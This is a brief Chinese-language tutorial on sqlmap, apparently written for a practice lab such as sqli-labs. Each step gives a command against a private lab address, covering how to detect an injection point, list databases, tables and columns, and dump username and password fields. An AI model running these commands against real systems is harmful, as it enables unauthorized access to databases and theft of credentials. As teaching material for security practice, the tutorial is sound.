sqlmap使用

sqlmap -u 'http://172.16.12.2/get.php?id=1' 检查是否存在注入点
sqlmap -u 'http://172.16.12.2/get.php?id=1' --dbs 查看所有数据库
sqlmap -u 'http://172.16.12.2/get.php?id=1' --current-db 查看当前使用的数据库
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips --tables 查看表名
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users --columns 列出所有字段名
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users -C id,password,username --dump 列出字段内容（数据）
sqlmap -u "http://192.168.198.128/sqli-labs-master/Less-1/?id=1" --dump 下载所有数据库

 

1. • 检查是否存在注入点•

sqlmap -u 'http://172.16.12.2/get.php?id=1'

参数：-u #目标 URL，中间显示y/n？是否需要跳过其他数据库的测试，判断本次测试是否成功？可以直接回车

表示存在注入点

 

2.查看所有数据库•

sqlmap -u 'http://172.16.12.2/get.php?id=1' --dbs

• 参数：-u #目标 URL 、 --dbs #所有数据库

 

3.查看当前使用的数据库

sqlmap -u 'http://172.16.12.2/get.php?id=1' --current-db

• 参数：-u #目标URL   --current-db #查看网站当前的数据库（d之前之后一个‘-’）

 

4.查看表名•

sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips --tables

-u # 目标 URL-D # 指定数据库 --tables #列出表名

 

5.列出所有字段名•

sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users --columns

• 参数：-u # 目标 URL-D # 指定数据库-T # 指定表名--columns #列出所有的字段名

 

6.列出字段内容（数据）•

sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users -C id,password,username --dump

-u # 目标 URL-D # 指定数据库-T # 指定表名-C # 指定字段--dump #列出字段内容，转存数据

 

7.下载所有数据库

sqlmap -u "http://192.168.198.128/sqli-labs-master/Less-1/?id=1" --dump